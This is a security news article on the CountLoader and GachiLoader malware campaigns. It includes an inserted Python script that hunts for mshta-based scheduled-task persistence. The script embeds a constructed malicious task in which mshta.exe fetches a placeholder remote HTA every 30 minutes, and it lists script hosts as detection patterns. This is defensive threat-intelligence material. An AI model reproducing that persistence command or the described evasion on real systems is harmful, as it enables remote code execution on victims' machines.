Cybersecurity researchers have uncovered a new campaign that uses cracked software distribution sites to deliver an updated version of a stealthy loader called CountLoader.
The campaign uses CountLoader in a multistage attack for initial access, evasion, and delivery of additional malware families, according to an analysis by the Cyderes Howler Cell Threat Intelligence team.
CountLoader, previously documented by Fortinet and Silent Push, is known for pushing payloads like Cobalt Strike, AdaptixC2, PureHVNC RAT, Amatera Stealer, and PureMiner. This loader has been active in the wild since at least June 2025.
The attack chain begins when users looking for cracked versions of legitimate software are led to a MediaFire link hosting a malicious ZIP archive. That ZIP contains a second, password-protected archive together with a Microsoft Word document holding the password needed to open it.
Inside the password-protected archive is a renamed Python interpreter (“Setup.exe”) that runs a command invoking “mshta.exe” to retrieve CountLoader 3.2 from a remote server.
To establish persistence, the malware creates a scheduled task named “GoogleTaskSystem136.0.7023.12” (a name chosen to pass as a Google updater) that runs every 30 minutes for 10 years, again invoking “mshta.exe” to fetch from a fallback domain should the primary server become unavailable.
The malware checks for CrowdStrike’s Falcon security tool and adjusts the persistence command accordingly. It can also download and execute payloads, spread via removable drives, and collect system information, among other functions.
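The persistence described above (a scheduled task that re-launches mshta.exe against a remote URL every 30 minutes for years) is straightforward to hunt for once task definitions are exported. The following Python is an added example written for this page, not code from Cyderes or from the article: it parses Task Scheduler XML, the format produced by `schtasks /query /tn <name> /xml`, and flags tasks whose action runs mshta.exe or a similar script host with a URL argument, and whose trigger repeats at short intervals for a year or more. The two embedded task definitions are constructed for the example; the task name is the one reported in the article, while the fallback URL `fallback.example.invalid` and the benign backup task are placeholders.

```python
"""Hunt Task Scheduler XML exports for mshta-style persistence (added example)."""
import re
import xml.etree.ElementTree as ET
from pathlib import PureWindowsPath

# Task Scheduler's XML namespace, used by every `schtasks /query /xml` export.
NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# Script hosts routinely abused to fetch and run remote code; mshta.exe is the
# one the article names, the others are added for broader coverage.
REMOTE_SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe", "rundll32.exe"}
URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)

# Task Scheduler durations use the ISO 8601 form PnYnMnDTnHnMnS.
_DUR_RE = re.compile(
    r"P(?:(\d+)Y)?(?:(\d+)M)?(?:(\d+)D)?(?:T(?:(\d+)H)?(?:(\d+)M)?(?:(\d+)S)?)?"
)


def iso_duration_seconds(text):
    """Convert a Task Scheduler duration to seconds (months/years approximated)."""
    m = _DUR_RE.fullmatch(text.strip())
    if not m:
        raise ValueError(f"unrecognised duration: {text!r}")
    y, mo, d, h, mi, s = (int(g) if g else 0 for g in m.groups())
    return y * 365 * 86400 + mo * 30 * 86400 + d * 86400 + h * 3600 + mi * 60 + s


def analyze_task_xml(xml_doc):
    """Return a list of (rule, detail) findings for one exported task.

    Accepts str or bytes; real exports are UTF-16 with an XML declaration, so
    pass the raw bytes and let the parser honour the declared encoding.
    """
    root = ET.fromstring(xml_doc)
    name = root.findtext("t:RegistrationInfo/t:URI", default="<unnamed>", namespaces=NS)
    findings = []

    # Rule 1: a LOLBin script host launched with a remote URL as its argument.
    for exe in root.findall("t:Actions/t:Exec", NS):
        cmd = exe.findtext("t:Command", default="", namespaces=NS).strip().strip('"')
        args = exe.findtext("t:Arguments", default="", namespaces=NS) or ""
        image = PureWindowsPath(cmd).name.lower()  # handles full paths and bare names
        urls = URL_RE.findall(args)
        if image in REMOTE_SCRIPT_HOSTS and urls:
            findings.append(("remote_script_host", f"{name}: {image} {urls[0]}"))

    # Rule 2: beacon-like repetition, every hour or less, kept up for a year or more.
    for rep in root.iterfind(".//t:Repetition", NS):
        interval = rep.findtext("t:Interval", default="", namespaces=NS)
        duration = rep.findtext("t:Duration", default="", namespaces=NS)
        if interval and duration:
            if iso_duration_seconds(interval) <= 3600 and iso_duration_seconds(duration) >= 365 * 86400:
                findings.append(("beacon_schedule", f"{name}: every {interval} for {duration}"))
    return findings


# Constructed sample modelled on the article's description; the URL is a placeholder.
SUSPICIOUS_TASK_XML = """<Task version="1.4" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><URI>\\GoogleTaskSystem136.0.7023.12</URI></RegistrationInfo>
  <Triggers>
    <TimeTrigger>
      <Repetition>
        <Interval>PT30M</Interval>
        <Duration>P3650D</Duration>
        <StopAtDurationEnd>false</StopAtDurationEnd>
      </Repetition>
      <StartBoundary>2025-10-01T12:00:00</StartBoundary>
      <Enabled>true</Enabled>
    </TimeTrigger>
  </Triggers>
  <Actions Context="Author">
    <Exec>
      <Command>mshta.exe</Command>
      <Arguments>https://fallback.example.invalid/update.hta</Arguments>
    </Exec>
  </Actions>
</Task>
"""

# Constructed benign task for contrast: local binary, daily trigger, no repetition.
BENIGN_TASK_XML = """<Task version="1.4" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><URI>\\Backup\\NightlyExport</URI></RegistrationInfo>
  <Triggers>
    <CalendarTrigger>
      <StartBoundary>2025-10-01T02:00:00</StartBoundary>
      <ScheduleByDay><DaysInterval>1</DaysInterval></ScheduleByDay>
    </CalendarTrigger>
  </Triggers>
  <Actions Context="Author">
    <Exec>
      <Command>C:\\Tools\\export.exe</Command>
      <Arguments>--quiet</Arguments>
    </Exec>
  </Actions>
</Task>
"""

if __name__ == "__main__":
    for doc in (SUSPICIOUS_TASK_XML, BENIGN_TASK_XML):
        for rule, detail in analyze_task_xml(doc):
            print(f"[{rule}] {detail}")
```

To run this against a live host, export every task with `schtasks /query /xml` (or walk `C:\Windows\System32\Tasks`, where the same XML is stored per task) and feed each document to `analyze_task_xml`. Both rules are deliberately independent: the script-host rule catches the loader even if the operator changes the schedule, and the schedule rule catches a renamed or proxied launcher.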
The final payload deployed by CountLoader in the observed attack chain is an information stealer known as ACR Stealer.
YouTube Ghost Network Delivers GachiLoader
Check Point disclosed details of GachiLoader, a heavily obfuscated JavaScript malware loader distributed through the YouTube Ghost Network, a network of compromised YouTube accounts.
GachiLoader deploys a second-stage malware called Kidkadi, which uses a novel PE injection technique: it loads a legitimate DLL and then replaces its contents in memory with the malicious payload, relying on Vectored Exception Handling to carry out the swap.
As many as 100 YouTube videos have been flagged in the campaign, with GachiLoader also serving as a conduit for the Rhadamanthys information stealer malware.
GachiLoader performs anti-analysis checks, attempts to run with admin privileges, and tries to evade detection by security solutions like Microsoft Defender.
The loader uses several different techniques to fetch and execute the final payload, underscoring the need for defenders to keep pace with evolving malware evasion tactics.